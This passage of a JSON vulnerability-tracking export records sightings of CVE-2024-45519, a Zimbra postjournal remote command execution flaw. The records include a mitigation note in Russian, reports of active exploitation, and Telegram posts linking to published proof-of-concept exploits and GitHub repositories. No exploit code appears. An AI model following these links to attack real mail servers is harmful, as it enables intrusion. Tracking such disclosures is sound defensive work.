\u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u0443\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e. \n\n\u0414\u043b\u044f \u0441\u0438\u0441\u0442\u0435\u043c Zimbra, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u043d\u0435 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u043e \u043d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u043e, \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u0435 \u0434\u0432\u043e\u0438\u0447\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 postjournal \u043c\u043e\u0436\u043d\u043e \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c \u043a\u0430\u043a \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e \u043c\u0435\u0440\u0443 \u0434\u043e \u0442\u0435\u0445 \u043f\u043e\u0440, \u043f\u043e\u043a\u0430 \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435.", "creation_timestamp": "2024-10-02T12:24:36.000000Z"}, {"uuid": "e6928e07-7d96-4766-912a-48a634030c83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/Root_Exploit/805", "content": "PoC CVE-2024-45519 - Zimbra Postjournal Exploit \ud83d\udd2a\n\nExploit\n\n#Poc #cve #exploit \n\nJoin RootExploit \ud83d\udc8e", "creation_timestamp": "2024-10-07T15:28:05.000000Z"}, {"uuid": "682e2582-ebce-4f23-a589-89e0b428fa91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/Root_Exploit/795", "content": "exploit + lab setup for CVE-2024-45519 \ud83d\udd25\n\nGithub\n\n#Cve #Exploit\n\nJoin RootExploit \ud83d\udc8e", "creation_timestamp": "2024-10-05T11:18:39.000000Z"}, {"uuid": "f3ccb0c9-668b-41ec-8c3e-f63cba7f5fb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/ctinow/224425", "content": "Critical Zimbra Postjournal flaw CVE-2024-45519 actively exploited in the wild. Patch it now!\nhttps://ift.tt/duWePKx", "creation_timestamp": "2024-10-02T12:09:49.000000Z"}, {"uuid": "2b6e09f2-ae63-44ea-919a-91baf71ee64c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/xakep_ru/16495", "content": "\u0425\u0430\u043a\u0435\u0440\u044b \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Zimbra, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u044f \u043f\u0438\u0441\u044c\u043c\u0430 \u043d\u0430 SMTP-\u0441\u0435\u0440\u0432\u0435\u0440\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0443\u0436\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0443\u044e RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Zimbra. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043e\u0441\u043b\u043e\u0436\u043d\u044f\u0435\u0442\u0441\u044f \u0442\u0435\u043c, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u043d\u0430 SMTP-\u0441\u0435\u0440\u0432\u0435\u0440 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u043f\u0438\u0441\u0435\u043c.\n\nhttps://xakep.ru/2024/10/03/zimbra-cve-2024-45519/", "creation_timestamp": "2024-10-03T16:47:57.000000Z"}, {"uuid": "728b7d00-0b2a-41e9-a622-854a5650090f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/9166", "content": "Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution/", "creation_timestamp": "2024-09-29T15:35:51.000000Z"}, {"uuid": "333f3cc2-ff8f-44c1-9438-99e87671058c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11202", "content": "#exploit\n1. CVE-2024-45489:\nArc Browser RCE in JavaScript Boosts\nhttps://kibty.town/blog/arc\n\n2. CVE-2024-44623:\nBlind RCE issue(SPX-GC) in SPX-GC\nhttps://github.com/merbinr/CVE-2024-44623\n\n3. CVE-2024-6769:\nPoisoning the activation cache to elevate from medium to high integrity in Windows 10/11/Srv2019/Srv2022\nhttps://github.com/fortra/CVE-2024-6769\n\n4. CVE-2024-45519: \nZimbra SMTP RCE\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution\n]-> https://github.com/p33d/CVE-2024-45519", "creation_timestamp": "2024-11-01T03:20:06.000000Z"}]}